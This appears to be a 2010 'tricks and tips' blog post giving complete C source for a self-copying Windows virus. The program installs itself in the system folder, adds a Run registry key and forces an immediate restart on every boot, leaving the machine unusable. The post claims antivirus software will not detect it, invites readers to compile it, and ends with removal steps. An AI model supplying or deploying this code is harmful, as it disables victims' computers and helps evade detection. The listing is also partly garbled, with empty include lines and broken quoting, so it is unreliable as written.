Tuesday, 1 June 2010

CREATE A VIRUS FOR SYSTEM RESTART

Today I will show you how to create a virus that restarts the computer upon every startup. That is, upon infection, the computer will get restarted every time the system is booted. This means that the computer will become inoperable since it reboots as soon as the desktop is loaded.
For this, the virus need to be doubleclicked only once and from then onwards it will carry out rest of the operations. And one more thing, none of the antivirus softwares detect's this as a virus since this is coded in C. So if you are familiar with C language then it's too easy to understand the logic behind the coding.



Here is the source code.



#include

#include

#include



int found,drive_no;char buff[128];



void findroot()

{

int done;

struct ffblk ffblk; //File block structure

done=findfirst("C:\\windows\\system",&ffblk,FA_DIREC); //to determine the root drive

if(done==0)

{

done=findfirst("C:\\windows\\system\\sysres.exe",&ffblk,0); //to determine whether the virus is already installed or not

if(done==0)

{

found=1; //means that the system is already infected

return;

}

drive_no=1;

return;

}

done=findfirst("D:\\windows\\system",&ffblk,FA_DIREC);

if(done==0)

{

done=findfirst("D:\\windows\\system\\sysres.exe",&ffblk,0);

if

(done==0)

{

found=1;return;

}

drive_no=2;

return;

}

done=findfirst("E:\\windows\\system",&ffblk,FA_DIREC);

if(done==0)

{

done=findfirst("E:\\windows\\system\\sysres.exe",&ffblk,0);

if(done==0)

{

found=1;

return;

}

drive_no=3;

return;

}

done=findfirst("F:\\windows\\system",&ffblk,FA_DIREC);

if(done==0)

{

done=findfirst("F:\\windows\\system\\sysres.exe",&ffblk,0);

if(done==0)

{

found=1;

return;

}

drive_no=4;

return;

}

else

exit(0);

}



void main()

{

FILE *self,*target;

findroot();

if(found==0) //if the system is not already infected

{

self=fopen(_argv[0],"rb"); //The virus file open's itself

switch(drive_no)

{

case 1:

target=fopen("C:\\windows\\system\\sysres.exe","wb"); //to place a copy of itself in a remote place

system("REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\

CurrentVersion\\Run \/v sres \/t REG_SZ \/d

C:\\windows\\system\\ sysres.exe"); //put this file to registry for starup

break;



case 2:

target=fopen("D:\\windows\\system\\sysres.exe","wb");

system("REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\

CurrentVersion\\Run \/v sres \/t REG_SZ \/d

D:\\windows\\system\\sysres.exe");

break;



case 3:

target=fopen("E:\\windows\\system\\sysres.exe","wb");

system("REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\

CurrentVersion\\Run \/v sres \/t REG_SZ \/d

E:\\windows\\system\\sysres.exe");

break;



case 4:

target=fopen("F:\\windows\\system\\sysres.exe","wb");

system("REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\

CurrentVersion\\Run \/v sres \/t REG_SZ \/d

F:\\windows\\system\\sysres.exe");

break;



default:

exit(0);

}



while(fread(buff,1,1,self)>0)

fwrite(buff,1,1,target);

fcloseall();

}



else

system("shutdown -r -t 0″); //if the system is already infected then just give a command to restart

}


save it  as sysres.exe


Testing And Removing The Virus From Your PC



You can compile and test this virus on your own PC without any fear.To test, just doubleclick the sysres.exe file and restart the system manually.Now onwards ,when every time the PC is booted and the desktop is loaded, your PC will restart automatically again and again.

It will not do any harm apart from automatically restarting your system.After testing it, you can remove the virus by the following steps.



1. Reboot your computer in the SAFE MODE

2. Goto X:\Windows\System (X can be C,D,E or F)

3.You will find a file by name sysres.exe, delete it.

4.Type regedit in run.You will goto registry editor.Here navigate to



HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Run



There, on the right site you will see an entry by name "sres".Delete this entry.That's it.You have removed this Virus successfully.



This code may be Risky so be careful while you use this trick on your computer.

Subscribe to this Blog via Email:

Click here to Subscribe to FREE email updates from "Tricks and Tips", so that you do not miss out anything that can be valuable to you and your blog!!

0 comments:

Post a comment